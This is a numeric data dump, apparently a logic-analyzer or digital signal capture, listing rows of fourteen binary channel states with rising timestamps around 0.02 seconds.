1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922804e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922828e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922852e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922880e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9922956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9922980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923004e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923028e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923056e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923080e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923084e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9923132e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923164e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923204e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923228e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923256e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923280e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923304e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923308e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9923356e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923388e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923404e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923428e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923452e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923480e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923532e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923580e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923584e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9923628e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923656e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9923660e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923664e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923680e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923708e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9923756e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923780e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9923804e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923828e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9923856e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9923880e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.9923884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923888e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923932e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9923956e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9923980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924004e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924028e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924056e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924080e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924108e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924156e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924204e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924228e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924256e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924280e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924308e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924332e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924356e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9924360e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9924404e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9924428e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924436e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924456e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924480e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9924484e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9924532e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9924556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924604e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924628e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924656e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924680e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924708e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924732e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924756e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9924760e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.9924804e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.9924828e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924836e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924856e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924880e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9924956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9924980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925004e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925028e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925056e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925080e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925180e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925204e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925228e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925256e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925280e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925332e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925380e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925404e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925428e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925456e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925480e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925532e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925580e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925628e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.9925656e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.9925680e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.0050028e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.0050208e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.0050212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0050228e-02 0,0,0,1,0,0,0,0,0,0,0,1,0,1,2.0050252e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0050276e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.0050588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0050616e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.0050640e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0050668e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.0050692e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0050716e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.0050740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0050764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,1,2.0050788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0050816e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,2.0050820e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0050860e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0050868e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0050892e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0050900e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0050916e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0050940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0050992e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051016e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051040e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051068e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051092e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051116e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051216e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0051220e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0051268e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0051292e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051300e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051316e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051340e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0051344e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0051348e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0051392e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0051416e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.0051420e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051424e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051440e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051468e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051492e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051516e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051564e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051616e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051668e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051692e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051716e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051740e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051792e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051816e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051840e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051868e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051892e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051916e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0051964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0051988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052016e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0052020e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0052068e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0052092e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052100e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052116e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052216e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052240e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052268e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052292e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052316e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052416e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052440e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052468e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052492e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052516e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052540e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0052544e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0052548e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0052592e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0052616e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.0052620e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052624e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052640e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052668e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052692e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052716e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052764e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0052772e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0052816e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0052840e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0052848e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0052868e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0052892e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0052896e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0052916e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0052940e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0052964e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0052988e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0053016e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0053040e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0053068e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0053092e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0053140e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0053164e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0053188e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0053216e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053220e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053240e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053268e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053316e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053416e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053440e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0053444e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0053468e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0053492e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0053516e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0053540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053548e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053592e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053616e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053640e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053668e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053692e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053716e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053816e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053840e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053868e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053892e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053916e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0053964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0053988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054012e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0054020e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0054064e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0054088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054096e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054260e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054312e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0054316e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0054364e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0054388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054396e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054460e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054488e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054512e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054588e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0054592e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0054636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0054664e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.0054668e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054672e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054712e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054860e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054912e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0054940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0054964e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0054968e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0055012e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0055036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055044e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055064e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055088e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055112e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055188e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0055192e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0055236e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0055264e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.0055268e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055272e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055312e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055364e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055460e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0055468e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0055516e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0055540e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.0055544e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055548e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055588e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0055592e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0055596e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0055636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0055664e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055668e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055712e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055764e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0055768e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0055788e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0055816e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055820e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055864e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055888e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055916e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0055964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0055988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056064e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056116e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056216e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056260e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0056268e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0056316e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0056340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056348e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056388e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0056392e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0056396e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0056436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0056464e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,2.0056468e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056472e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056512e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056540e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056564e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056616e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056636e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056660e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0056668e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0056716e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0056740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056748e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056864e-02 